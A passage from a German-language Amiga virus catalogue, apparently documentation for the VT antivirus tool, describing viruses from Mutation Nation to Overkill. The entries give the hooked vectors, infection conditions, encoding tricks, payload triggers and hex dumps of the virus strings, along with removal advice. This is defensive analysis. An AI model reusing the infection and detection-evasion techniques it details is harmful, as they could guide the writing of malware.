  2344.        Verbogene Vektoren: Loadseg, FindTask
  2345.        Ueberlaeuft 3E8-, 3F0- und 3F1-Hunks
  2346.        Haengt sich hinter ersten Hunk.
  2347.        Starke Aehnlichkeit im Grundgeruest mit Ebola
  2348.        Mehrfach codiert
  2349.        Verwendet LEA mit ungerader Adresse
  2350.        Codierbyte wird mit SDFF006 geaendert.
  2351.        Fuer die Codierung wird in Abhaengigkeit von $DFF007 D0-D5 und
  2352.        A0-A5 verwendet.
  2353.        Im mehrfach mehrfach decodierten Linkteil ist zu lesen:
  2354.                      4e754475 70650000 536e6f6f     NuDupe..Snoo
  2355.             70446f73 20537570 706f7274 2050726f pDos Support Pro
  2356.             63657373 0000536e 6f6f7044 6f730000 cess..SnoopDos..
  2357.             2d3d2a20 4d757461 74696f6e 204e6174 -=* Mutation Nat
  2358.             696f6e20 56312e30 20627920 41495a20 ion V1.0 by AIZ
  2359.             2a3d2d00 00000003                   *=-.....
  2360.              ;....
  2361.             4ef900f8 274a0000 DEADC0DE 000003f2 N...'J..........
  2362.        Speichereinbau:  
  2363.        Zuerst Test auf SnoopDos (falls ja, nicht im Speicher ein-
  2364.        haengen).
  2365.        Test auf Dupe (Schutz fuer den Programmierer ????)
  2366.        Test ob Loadseg schon von Ebola verbogen (vergessen zu aendern
  2367.        oder nicht begriffen ??)
  2368.        Verbogener Loadseg-Vektor dient der Verseuchung.
  2369.        Verbogener Findtask-Vektor dient dem Programmierer wahrschein-
  2370.        lich als Selbstschutz.
  2371.        Linkablauf: 
  2372.        Test auf Disk Val.
  2373.        Mind. 5 Bloecke frei
  2374.        File groesser #2000 und kleiner #300000 Bytes   
  2375.        Test auf $DEADC0DE  (schon verseucht s.o. eine 0 nicht O) 
  2376.        Filename enthaelt nicht "." oder "-". UND uebernaechster Buch-
  2377.        stabe ( 2(a0) ) ist nicht a, e, n .
  2378.        Suche nach $4EAE    ( jsr -xy(Lib-Base) )
  2379.                            ( xy ist variabel )
  2380.        Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFE.
  2381.        $4EAE wird in $4EBA  ( jsr Hunkende(PC) ) geaendert.
  2382.        Neu: !!!
  2383.        Schreibt Original-Comment
  2384.        Setzt Original-Protection-Bytes
  2385.        Schreibt Original-FileDate
  2386.        Wenn Sie also in VT-Prefs zeige FileDate und Protection-Bytes
  2387.        anschalten beim Filetest, koennen Sie leider keinen Unterschied
  2388.        mehr feststellen. Bei Filelaenge natuerlich schon, aber wer hat
  2389.        die im Kopf. Einzige Moeglichkeit waere hier mit VT ein LogFile
  2390.        mit allen Filelaengen von wichtigen Unterverzeichnissen anlegen
  2391.        zu lassen.
  2392.        Aber !!!!
  2393.        Wenn man vor einiger Zeit mit VT Pruefsummen berechnet haette,
  2394.        waere JEDES einzelne verseuchte File beim Filetest mit Pruef-
  2395.        summe SOFORT aufgefallen !!!! Aber wer denkt schon an Vorsorge-
  2396.        massnahmen, wenn alles laeuft (der Schutz von einigen dirs z.B.
  2397.        c, devs, l, libs usw. ).
  2398.        Weitere Schaeden:
  2399.        Sobald die Systemzeit den Wert $1A39  (19. Mai 1996) und
  2400.        eine Zaehlzelle den Wert $14 erreichen, erfolgt ein move.l $0,$4 .
  2401.  
  2402.  
  2403.    - MUTILATOR-Virus   BB
  2404.       Namensbegruendung: siehe unten
  2405.       Fordert trackdisk.device NICHT
  2406.       Im Speicher immer ab $7CAD0
  2407.       Verbogene Vektoren: Cool, DoIo
  2408.       Decodiert mit eori.b #$27,(a1)+ steht im Speicher:
  2409.            00000000 00aa0c54 48495320 49532054 .......THIS IS T
  2410.            4845204e 4557204d 5554494c 41544f52 HE NEW MUTILATOR
  2411.            2d564952 55532021 000100d2 14425920 -VIRUS !.....BY
  2412.            4d415820 4f462053 5441524c 49474854 MAX OF STARLIGHT
  2413.            00000000 00005468 616e7820 746f2054 ......Thanx to T
  2414.            68652045 78656375 746f7273 20666f72 he Executors for
  2415.            20537072 65616469 6e672074 68697320  Spreading this
  2416.            47524541 5420636f 64652021 20646f6e GREAT code ! don
  2417.            653a202d 20313939 32202d20 00000000 e: - 1992 - ....
  2418.        Vermehrung: BB
  2419.           Vermehrung mit DoIo ist nur moeglich, wenn Speicher ab
  2420.           $C000000 vorhanden ist !!!!
  2421.        Schaeden:
  2422.           Sobald eine Zaehlzelle den Wert $e0 und eine andere den
  2423.           Wert 3 erreicht hat, Textausgabe (s.o.)
  2424.  
  2425.    - MVK   17.11.92  FileVirus   Laenge: 1052 Bytes  wird weitergegeben
  2426.       als MVK.lzh  Laenge: 1171 Bytes
  2427.  
  2428.       Namensbegruendung: aus Readme.file in Archiv Laenge: 469 Bytes
  2429.  
  2430.        Yeah, SUPPLEX presents a new Mini-Virus-Killer !!!
  2431.        To Start write > MVK < and MVK is than aktiv in your Memory,
  2432.        don't panic it is not a Virus..........
  2433.        MVK-Archiv contains :
  2434.        MVK.exe
  2435.        Readme.file  ( You read this now )
  2436.  
  2437.       Im File ist uncodiert zu lesen:
  2438.           2A2C202F 41414600 F00F412E 492E442E *, /AAF.d.A.I.D.
  2439.           53205649 5255532D 48554E54 455200FF S VIRUS-HUNTER.y
  2440.  
  2441.       Es handelt sich also um eine Meisterleistung:
  2442.          - jemand hat es geschafft  L.A.D.S  in A.I.D.S  umzuwandeln.
  2443.          - jemand hat es geschafft mit einem UtilityPrg einen BB in ein
  2444.            ausfuehrbares Prg. umzuwandeln.
  2445.          - jemand hat es NICHT geschafft die codierte Graphik-Text-Routine
  2446.            zu aendern
  2447.       Es handelt sich also in Wirklichkeit um den LADS-BB-Virus. Lesen
  2448.       Sie bitte dort nach. Das Prg vermehrt sich NUR als BB. Da die
  2449.       DOS0-BB-Kennung fehlt, entsteht eine nicht bootbare Disk !!!
  2450.       VT erkennt im Speicher und beim FileTest LADS-Virus.
  2451.  
  2452.    - MwB-Virus BB   ein echter Julie s.o.
  2453.       Da der Julie.BB nicht den ganzen BB braucht, hat es jemand geschafft,
  2454.       einen Text einzubauen, der NIE erreicht wird. VT erkennt weiterhin
  2455.       Julie .      
  2456.            ccccc9df df000000 4d77422f 4777482f ........MwB/GwH/
  2457.            74686520 62657374 20696e20 686f6c6c the best in holl
  2458.            616e6400 00000000 00000000 00000000 and.............
  2459.  
  2460.  
  2461.    - NANO   File-Virus  Laenge: 1484 Bytes   KS2.04: ja
  2462.       Im Speicher immer ab: $7C000   Cool $7C0DE, OldOpenLib $7C1CC
  2463.       und SumKickData $7C3B2
  2464.       Grundgeruest ist die Compuphagozyte-Familie, erweitert um zwei
  2465.       Ausgaberoutinen.
  2466.       Schreibt in erste Zeile der startup-sequence:
  2467.         $A0A0A0A0A0A0," ",$0A
  2468.       Schreibt sich als unsichtbares ($A0A0A0A0A0A0) Programm in die
  2469.       Root-Dir (erzwungen durch : ).
  2470.       Beim Test gab es Probleme fuer das Virus-Prg, die richtige Startup-
  2471.       Sequence-Laenge zurueckzuschreiben. Sie muessen also mit dem Total-
  2472.       verlust der Startup-Sequence rechnen. Weiterhin wird die startup-
  2473.       sequence immer wieder verseucht (Beispiel s.u.), OHNE Test auf schon
  2474.       veraendert. Also eine typische ANFAENGER-Programmierung.
  2475.            a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a        .       .
  2476.            a0a0a0a0 a0a0200a a0a0a0a0 a0a0200a        .       .
  2477.            a0a0a0a0 a0a0200a 636c730a 0a020000        .cls.....
  2478.  
  2479.       Hat zwei Zaehlzellen:
  2480.            a) Ausgabe der Deutschlandfarben
  2481.            b) DisplayAlert:
  2482.                     ... another masterpiece by  N A N O  !!!
  2483.         GREETINGS TO:
  2484.         Byte Bandit, Byte Warrior, DEF JAM, DiskDoktors
  2485.         FANTASY, Foundation For The Extermination Of Lamers,
  2486.         I.R.Q. Team, Obelisk Softworks Crew, S.C.A., UNIT A ...
  2487.       VT2.52 erkennt und loescht: 31.03.93
  2488.       Bitte denken Sie daran, auch die startup-sequence zu aendern !!!
  2489.  
  2490.    - Nano 2 FileVirus  Laenge: 1472 Bytes
  2491.       Im Speicher immer ab $7C000, Vektoren werden teilweise nach
  2492.       $7A000 gerettet.
  2493.       Namensbegruendung:
  2494.       Im File ist zu lesen:
  2495.        Virus in 9.91 by Nano  (die Jahreszahl duerfte falsch sein)
  2496.       Ein codierter Bereich fehlt im Gegensatz zu CompuPhagozyte 8
  2497.       ALLE verbogenen Vektoren und Routinen sind gleich, liegen aber
  2498.       natuerlich an verschobenen Speicherstellen, da der Eingangstext
  2499.       von CompuPhagozyte 8 laenger ist. Also lesen Sie bitte das gleiche
  2500.       Verhalten bei CompuPhagozyte 8 nach.
  2501.        Fehlerquelle2 :
  2502.        Das Virusteil verraet sich nach einem Reset und schreibge-
  2503.        schuetzter Disk mit einem SystemRequest:
  2504.                    Volume
  2505.                    xyz
  2506.                    is write protected
  2507.       VT loescht Nano2 . Sie muessen mit einem Editor die 1.Zeile
  2508.       der Startup-sequence loeschen !!!!!!
  2509.  
  2510.    - NaST  29.03.92  File    Laenge: 2608 Bytes
  2511.       auch KS2.04
  2512.       Grundgeruest: BGS9
  2513.          KickMem, KickTag, KickCheckSum, Openwindow (int.lib)
  2514.       Neu: $6c, FindTask, OldOpenLib, NewOpenLib
  2515.            dafuer fehlt decode BitPlanes
  2516.       Herkunft des Namens:  2x im Virus-File zu lesen
  2517.       verschiebt Orig-File unsichtbar nach c
  2518.        $A020A020A020202020A0202020A0
  2519.       VT versucht zuerst rename und falls OrigFile nicht gefunden,
  2520.       wird angeboten das Virus-File allein zu loeschen. Dann muessen
  2521.       Sie aber wahrscheinlich die 1.Zeile der startup-sequence aendern.
  2522.  
  2523.    - Nasty-Nasty  BB  nur KS1.2  immer ab $7F000
  2524.     Cool, DoIo, Userstate, Superstate, Alert
  2525.       Vermehrung und Schaeden:
  2526.          - BB
  2527.          - sobald die Zaehlzelle den Wert 5 erreicht hat:
  2528.                format Disk
  2529.       Das VirusPrg gibt keine Meldung aus. Im BB ist Nasty-Nasty! zu
  2530.       lesen.
  2531.  
  2532.    - NAZI-Virus  BB   s.u.  SCA-PKK  Virus
  2533.  
  2534.    - NComm32-Trojan   Zerstoerungsfile  siehe bei CoP-Trojan
  2535.       Anderer moeglicher Name: CIRCLE OF POWER Trojan
  2536.  
  2537.          
  2538.    - NEurOTiCDEatH-Virus  Typ 1  Linkvirus
  2539.       Namensbegruendung:    
  2540.            Im LinkTeil ist zu lesen:   
  2541.            00000000 2a5b6d75 54416765 4e325d2a ....*[muTAgeN2]*
  2542.            000000a0 0d2d2d2d 3d5b204e 4575724f .....---=[ NEurO
  2543.            54694320 44456174 48205d3d 2d2d2d20 TiC DEatH ]=---
  2544.       Fileverlaengerung: #3400-4200 Bytes
  2545.       Nicht Resetfest
  2546.       Ab KS 2.04
  2547.       Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2548.       Das Virusteil soll ab 21. Jan. 97 aktiviert werden.
  2549.       Speicherverankerung:
  2550.            - Test ob schon im Speicher
  2551.            - Loadseg NewLoadSeg DoIo werden verbogen
  2552.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2553.       Linkvorgang:
  2554.            - Mit LoadSeg
  2555.            - Medium validated
  2556.            - File ausfuehrbar ($3F3)
  2557.            - CodeHunk wird gefunden ($3E9)
  2558.            - Ueberlaeuft $3F1-Hunks
  2559.            - Filelaenge groesser #16384
  2560.            - File kleiner einem bestimmten Wert, abhaengig von der
  2561.              Gesamtblockzahl des Mediums.
  2562.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2563.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2564.              oder jsr -xy(a6) ($4EAE Fxyz)
  2565.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2566.            - das Teil codiert sich immer neu mit $DFF007
  2567.       Meldung:
  2568.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2569.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2570.            - Danach Reset
  2571.       Zerstoerung:
  2572.            - Mit DoIo
  2573.            - zerstoerter Block Blocknummer immer groesser #63
  2574.              Am Blockanfang ist dann zu lesen:
  2575.              Z    12 Bl     20
  2576.              00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D
  2577.              10: 45617448 205d3d2d 2d2d2020 28632920 EatH ]=---  (c)
  2578.              20: 31393937 20506f6c 616e6400 78e97fd1 1997 Poland.x..
  2579.            - Dieser Block ist NICHT zu retten
  2580.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2581.       VT versucht den Linkausbau bei einem ausfuehrbaren File.
  2582.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2583.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2584.  
  2585.          
  2586.    - NEurOTiCDEatH-Virus  Typ 2  Linkvirus
  2587.       Namensbegruendung:    
  2588.            Im LinkTeil ist zu lesen: 
  2589.            3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....-
  2590.            2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE
  2591.            61744820 32205d3d 2d2d2d20 20286329 atH 2 ]=---  (c)
  2592.       Fileverlaengerung: #3652-4452 Bytes
  2593.       Nicht Resetfest
  2594.       Ab KS 2.04
  2595.       Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2596.       Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2597.       Speicherverankerung:
  2598.            - Test ob schon im Speicher
  2599.            - Loadseg NewLoadSeg DoIo werden verbogen
  2600.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2601.       Linkvorgang:
  2602.            - Mit LoadSeg
  2603.            - Medium validated
  2604.            - File ausfuehrbar ($3F3)
  2605.            - CodeHunk wird gefunden ($3E9)
  2606.            - Ueberlaeuft $3F1-Hunks
  2607.            - Filelaenge groesser #12288
  2608.            - File kleiner einem bestimmten Wert, abhaengig von der
  2609.              Gesamtblockzahl des Mediums.
  2610.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2611.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2612.              oder jsr -xy(a6) ($4EAE Fxyz)
  2613.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2614.            - das Teil codiert sich immer neu mit $DFF007
  2615.       Meldung:
  2616.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2617.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2618.            - Danach Reset
  2619.       Zerstoerung:
  2620.            - Mit DoIo
  2621.            - zerstoerter Block Blocknummer immer groesser #63   
  2622.              Am Blockanfang ist dann zu lesen:  
  2623.              Z    33 Bl      6
  2624.              00: 2d2d2d3d 5b204e45 75724f54 69432044 ---=[ NEurOTiC D
  2625.              10: 45617448 2032205d 3d2d2d2d 20202863 EatH 2 ]=---  (c
  2626.              20: 29203139 39372050 6f6c616e 6400f94c ) 1997 Poland..L
  2627.            - Dieser Block ist NICHT zu retten
  2628.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2629.       VT versucht den Linkausbau bei einem ausfuehrbaren File. 
  2630.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2631.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2632.  
  2633.          
  2634.    - NEurOTiCDEatH-Virus  Typ 3  Linkvirus
  2635.       Namensbegruendung:    
  2636.            Im decodierten LinkTeil ist zu lesen: 
  2637.            3d5b4d74 675f3243 5d3d0000 00a00d2d =[Mtg_2C]=.....-
  2638.            2d2d3d5b 204e4575 724f5469 43204445 --=[ NEurOTiC DE
  2639.            61744820 33205d3d 2d2d2d20 20202863 atH 3 ]=---   (c
  2640.       Fileverlaengerung: #4064-4864 Bytes
  2641.       Nicht Resetfest
  2642.       Processor besser als 68000
  2643.       Verbogene Vektoren: LoadSeg DoIo
  2644.       Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2645.       Speicherverankerung:
  2646.            - Test ob schon im Speicher
  2647.            - Test ob Antivirusprg.e aktiv  (z.B Vir...)
  2648.            - Loadseg und DoIo werden verbogen
  2649.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2650.       Linkvorgang:
  2651.            - Mit LoadSeg
  2652.            - Medium validated
  2653.            - File ausfuehrbar ($3F3)
  2654.            - CodeHunk wird gefunden ($3E9)
  2655.            - Ueberlaeuft $3F1-Hunks
  2656.            - Filelaenge groesser #12288
  2657.            - File kleiner einem bestimmten Wert, abhaengig von der
  2658.              Gesamtblockzahl des Mediums.
  2659.            - Gesucht wird am Ende des 1.Hunks in einem Bereich von
  2660.              #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz)
  2661.              oder jsr -xy(a6) ($4EAEwxyz)
  2662.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2663.            - das Teil codiert sich immer neu mit $DFF007
  2664.       Meldung:
  2665.            - Abhaengig von DateStamp ($4EC = 21:00) soll mit
  2666.              DisplayAlert (Text siehe oben) eine Ausgabe erfolgen.
  2667.            - Danach Reset
  2668.       Zerstoerung:
  2669.            - Mit DoIo
  2670.            - zerstoerter Block Blocknummer immer groesser #63
  2671.            - Routine: move.l d0,(a2,d1.w)
  2672.              Da das geschriebene LW (d0) sich IMMER aendert, kann VT
  2673.              so einen Block NICHT erkennen !!!!
  2674.            - Dieser Block ist NICHT zu retten
  2675.       VT versucht die Vektoren im Speicher zurueckzusetzen.
  2676.       VT versucht den Linkausbau bei einem ausfuehrbaren File.   
  2677.       Hinweis: Falls Sie ein verseuchtes File kopieren und FileDate
  2678.       nicht mitnehmen, so kann das File noch einmal verseucht werden.
  2679.                  
  2680.    - NEurOTiCDEatH-Virus  Typ 5  Linkvirus
  2681.         Name NICHT nachvollziehbar, sondern uebernommen
  2682.            Im decodierten LinkTeil ist zu lesen:  
  2683.            8002ee58 32c04e75 00000002 00005b4d ...X2.Nu......[M
  2684.            74675f33 415d0000 1bdf0000 00096100 tg_3A]........a.
  2685.         Im Vergleich zu Typ 3 habe ich also keinen Neuro..-Text
  2686.         gefunden
  2687.         Fileverlaengerung: groesser #6000 Bytes und kleiner #8000 Bytes
  2688.             (so war es bei meinen Tests)
  2689.         Nicht Resetfest
  2690.         Processor besser als 68000
  2691.         Nicht alle Kickstart-Versionen
  2692.         Verbogene Vektoren: LoadSeg NewLoadSeg DoIo
  2693.         Das Virusteil soll ab 28. Dez. 96 aktiviert werden.
  2694.         Speicherverankerung:
  2695.            - Test ob schon im Speicher z.B. DebugData
  2696.            - Test ob Antivirusprg.e aktiv  (z.B Xtruder)
  2697.            - Loadseg NewLoadSeg und DoIo werden verbogen
  2698.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  2699.         Linkvorgang:
  2700.            - Mit LoadSeg und NewLoadSeg
  2701.            - Medium validated
  2702.            - File ausfuehrbar ($3F3)
  2703.            - CodeHunk wird gefunden ($3E9)
  2704.            - Ueberlaeuft $3F1-Hunks
  2705.            - Filelaenge groesser #32768
  2706.            - File kleiner #286720
  2707.            - Gesucht wird im 1.Hunks nach bcc ($6v00wxyz),
  2708.              jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAEwxyz)
  2709.            - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt
  2710.            - das Teil codiert sich immer neu mit $DFF007
  2711.         Meldung:
  2712.            - KEINE
  2713.         Zerstoerung:
  2714.            - Mit DoIo Speichermuell schreiben
  2715.            - zerstoere Zufalls-Block in Abhaengigkeit von $DFF006
  2716.            - Zufallsblock immer groesser #63 ($7E00)
  2717.            - VT kann  so einen Block NICHT erkennen
  2718.            - Dieser Block ist NICHT zu retten
  2719.         VT versucht die Vektoren im Speicher zurueckzusetzen.
  2720.         VT kann nicht alle Files reparieren.
  2721.         Falls es zu Fehlerkennungen am File kommt, schicken Sie mir
  2722.         bitte solche Files.
  2723.  
  2724.    - New Age Virus    Link
  2725.       Verbogener Vektor: DosWrite
  2726.       Verlaengert ein File um 668 Bytes
  2727.       KS 1.3: nein
  2728.       KS 2.0: ja    mit Test ob in dos.lib $4EF9 verwendet wird
  2729.       Nicht Resetfest
  2730.       Verseuchte Files sind SELTEN lauffaehig. VT bietet nur loeschen
  2731.       an.
  2732.       Im verseuchten File ist uncodiert zu lesen:  
  2733.            4bc20000 00030032 4e657720 41676520 K......2New Age
  2734.            56697275 7320a920 31393932 20427920 Virus . 1992 By
  2735.            4576696c 204a6573 7573646f 732e6c69 Evil Jesusdos.li
  2736.       Vermehrungsbedingungen:
  2737.             File groesser 4096 Bytes
  2738.             File kleiner 65536 Bytes
  2739.             File ist ausfuehrbar 3F3
  2740.             Die ersten vier Bytes im 1.Hunk enthalten nicht
  2741.               $4e75 oder $4AFC   (wg. Lib)
  2742.       Das Teil schreibt sich an den Anfang des 1.Hunks und verschiebt
  2743.       den Rest. Die HUNK-Reloc-Behandlungsroutine ist so schlecht, dass
  2744.       kaum ein verseuchtes File richtig arbeiten kann.
  2745.  
  2746.  
  2747.    - Nibbler-Inst.     Installer fuer Nibbler-Virus  siehe unten
  2748.        Bekannter Filename: cpu
  2749.        Laenge: 4584 Bytes
  2750.        Das Virusteil sitzt mitten im 1.Hunk. So kann sich das Teil
  2751.        NICHT selbst anlinken.
  2752.  
  2753.  
  2754.    - Nibbler-Virus      File  Link
  2755.        anderer moeglicher Name: Biochip
  2756.        Fileverlaengerung: 924 Bytes
  2757.        ab KS2.04: ja
  2758.        Mehrfachlinks: ja  (nach Virusprg. sollte das nicht sein)
  2759.        Namensbegruendung:  im Linkteil ist uncodiert zu lesen:
  2760.             2d6c0298 ff6c6000 02944e69 62626c65 -l...l`...Nibble
  2761.             7220312e 30626574 61202d20 78782f78 r 1.0beta - xx/x
  2762.             782f7878 202d2062 79204269 6f636869 x/xx - by Biochi
  2763.             7020432e 20230000                   p C. #..
  2764.        Verbogener Vektor: LoadSeg
  2765.        Resetfest: Nein
  2766.        Link hinter den ersten Hunk.
  2767.        VT versucht Loadseg im Speicher zurueckzusetzen.
  2768.        VT versucht den Linkteil aus einem File auszubauen.
  2769.        Speicherverankerung:
  2770.          - VirusZ, SnoopDos usw. nicht im Speicher
  2771.          - LoadSeg wird verbogen
  2772.        Vermehrungsbedingungen:
  2773.          - File ist noch nicht verseucht (Test auf "OS")
  2774.            Diese Abfrage arbeitet bei hoeheren Prozessoren nicht
  2775.            richtig. Folge: Mehrfachlinks
  2776.          - Filename enthaelt nicht "VI","VW","VT" usw.
  2777.          - min. Filelaenge #2300 Bytes
  2778.          - File ausfuehrbar
  2779.          - 3E9-Hunk wird gefunden  (Loop)
  2780.            Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!!
  2781.          - Disk validated
  2782.          - kein Fremdformat "BAD" oder NDOS
  2783.          - mind. 50 Block frei
  2784.          - RTS wird gefunden
  2785.          - RTS wird ersetzt durch bra.s
  2786.              Hinweis: Da die RTS-Suchschleife falsch programmiert ist
  2787.              (Anfaenger !!!), koennen nicht-lauffaehige Programme ent-
  2788.              stehen.
  2789.          - rettet FileProtection, FileComment und FileDate
  2790.              Die veraenderten Files waeren aber von aelteren VT-Vers.
  2791.              dennoch erkannt worden, wenn Sie Vorsorge getroffen haetten,
  2792.              und fuer die Files in c, devs, libs usw. mit VT vorher (!!!)
  2793.              Pruefsummen gebildet haetten.
  2794.        Das Teil meldet sich nicht.
  2795.        Hinweis:
  2796.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  2797.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  2798.          wird dadurch geringer.
  2799.  
  2800.    - NO BANDIT   (siehe unten Virenfinder)
  2801.  
  2802.    - NoCare-Virus   s.o. Labtec-Trojan
  2803.  
  2804.    - No head     s.b. ByteBanditPlus
  2805.  
  2806.    - No Name 1    anderer und richtiger Name :  Byte Bandit 2
  2807.       kein FastMem, BeginIo, KickTag, KickCheckSum, Vec5
  2808.       SpeicherLage ueber structMemList, Speicherreservierung fuer
  2809.       neuen  BBVirus mit allocmem, Zaehlstelle: Virusstart + $1c
  2810.       Vermehrung: ueber BB
  2811.       Im BB lesbar: trackdisk.device (weit unten)
  2812.       ein ByteBanditClone, ohne Tastaturabfrage, nur 5 Kopien und
  2813.       kuerzer gesetzter Zeit
  2814.  
  2815.    - NoName2   BB   Cool, DoIo, SumKickData  auch KS2.04
  2816.       Vermehrungszaehler: bei mir  $269
  2817.       Es ist mir ein Raetsel, warum dieser BB solange unbemerkt bleiben
  2818.       konnte. Im letzten Jahr hat es kein Virus weiter als $10 ge-
  2819.       bracht. Dann hat ihn jemand spaetestens entdeckt.  ???
  2820.       Erstinstallierung im Speicher von BB:
  2821.       Falls Cool und KickTag nicht Null oder DoIo nicht Original, dann
  2822.       RESET.
  2823.       Nach Installierung und Reset sichert der Virus sein Prg durch
  2824.       AllocAbs.
  2825.       Vermehrung und Schaden:
  2826.       ueber BootBlock
  2827.       Rueckgabewert von SumKickData in d0 enthaelt Wert aus $DFF006.
  2828.       Virus meldet sich NIE. Kein Name versteckt oder codiert, deshalb
  2829.       NoName2 . Im BB ist ab $264  trackdisk.device zu lesen.
  2830.  
  2831.    - No-Guru V2.0   Filelaenge: 1224 Bytes (mit PP-Data-Prg.teil)
  2832.       Nach meiner Meinung nur gefaehrlich fuer AmiExpress-Benutzer
  2833.          (hab ich nicht)
  2834.       verbiegt: Alert, Autorequest
  2835.       Textausgabe im Cli:   u.a.
  2836.          Making life with AmiExpress just that little bit easier...
  2837.       Sucht nach bss:user.data ; Falls vorhanden werden $8000 Bytes
  2838.       geladen. Der geladene Teil wird nach renegade, jock rockwell
  2839.       oder spiral durchsucht und gegebenenfalls geaenderte Daten
  2840.       zurueckgeschrieben.
  2841.       Empfehlung: loeschen
  2842.  
  2843.    - NorthStar   anderer Name: Starfire  s.u.
  2844.  
  2845.    - NoVi   (File)  TerroristsClone s.u.  Laenge:1612 Bytes
  2846.       Aenderungen: TTV1 geaendert in NoVi
  2847.          Orig-File wird jetzt nach sys:c/.fastdir,$A0 verschoben.
  2848.  
  2849.    - Nuked007    siehe bei SHIT
  2850.  
  2851.    - Obelisk1  ( Deutschlandfahne + Graphiktext) Einsprung:cool
  2852.                schreibt in Speicherstelle $00000060 das Wort GURU
  2853.                zerstoert damit den Ausnahmevector, der ins ROM
  2854.                IR-Ebene 7 zeigt !!
  2855.  
  2856.    - Obelisk2   Begin, KickTag, KickCheckSum, Vec5
  2857.                 Einsprung:KickTag ,drei ZaehlZellen, Ausgabe:Graphik-
  2858.                 text mit FormatAndrohung, wird nur durch KopfAnschlag
  2859.                 vorgetaeuscht !! Nachweis mit TrackDisplay !!
  2860.                 Speicherstelle $60 s.o.
  2861.  
  2862.    - O.M.S.A Virus  BB   TimeBomb V1.0 Clone  siehe unten
  2863.          Nur Texte geaendert.
  2864.             Text fuer DisplayAlert:
  2865.            14486568 652e2e2e 4c6f6f6b 73206c69 .Hehe...Looks li
  2866.            6b652079 6f757220 6469736b 20676f74 ke your disk got
  2867.            20667563 6b656421 2054616b 65206120  fucked! Take a
  2868.            73686f77 65722121 21000000 42b90007 shower!!!...B...
  2869.             Namensbegruendung:
  2870.            4f2e4d2e 532e4120 76697275 73207631 O.M.S.A virus v1
  2871.            2e302100 00000000 00000000 00000000 .0!.............
  2872.  
  2873.  
  2874.    - OP1    (Neuseeland)  richtiger Name: Joshua
  2875.  
  2876.    - OPAPA     Begin, KickTag, KickCheckSum, Vec5
  2877.                Zaehlzelle: ja, Vermehrung: ueber BB jedes LW
  2878.                Textausgabe (ueber Graphik) OPAPA-VIRUS READY STEADY FORMAT
  2879.                Kopf steppt nach Track 0 alle LW
  2880.          Clone: 04.03.92   Text entfernt
  2881.  
  2882.    - Overkill VIRUS  BB  Block 0-3  auch KS2.04, immer ab $7F700
  2883.          Cool, KickCheckSum,SumKickData, DoIo
  2884.          fordert trackdisk.device NICHT   = auch HD !!!!!!!
  2885.          Namensbegruendung:
  2886.          decodiert ist im Speicher zu lesen: Overkill by the ENEMY !
  2887.          Decodierroutineteil:
  2888.             sub.b d6,d5
  2889.                         move.b d5,(a5)+
  2890.          holt 4 Bloecke:
  2891.          Block 0 u. 1 = Virus
  2892.          Block 2 u. 3 = OrigBB  nicht codiert
  2893.          Vermehrung:
  2894.          Codiert jeden Virus fuer BB neu in Abhaengigkeit von $DFF006
  2895.          speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt,
  2896.          wird zerstoert.
  2897.          Schaden: (auch HD!!!!!!!!)
  2898.          - Bestimmt ueber $DFF006 eine Blocknummer
  2899.          - Schreibt ZWEI Bloecke (ist neu) mit Speicherinhalt.
  2900.            d.h. im unguenstigen Fall wird Block1 an das Ende eines Files
  2901.            und Block2 an den Beginn eines zweiten Files geschrieben.
  2902.            Diese Files sind NICHT zu retten. Im 1.ZerstoerungsBlock
  2903.            steht ab $22 Overkill by the ENEMY !. Da KEINE Blockaus-
  2904.            wertung erfolgt, kann auch ein Dir-Block, ListBlock usw.
  2905.            zerstoert werden. Versuchen Sie bitte mit disksalv zu retten,
  2906.            was noch brauchbar ist.
  2907.            Zyl 0 Block  55
  2908.                ^
  2909.          0000: 0007f708 00000000 4afc0007 f7080007 ........J.......
  2910.          0010: ff00011f 00450007 f7220007 f7220007 .....E..."..."..
  2911.          0020: f7d64f76 65726b69 6c6c2062 79207468 ..Overkill by th
  2912.          0030: 6520454e 454d5920 21002879 0007fab0 e ENEMY !.(y....
  2913.            Sie sehen: Es kann auch den Rigid-Bereich erwischen !!!
  2914.  
  2915.            Mit OrigBB koennen Sie den Block2-3 nach Block0-1 kopieren
  2916.            und abspeichern.
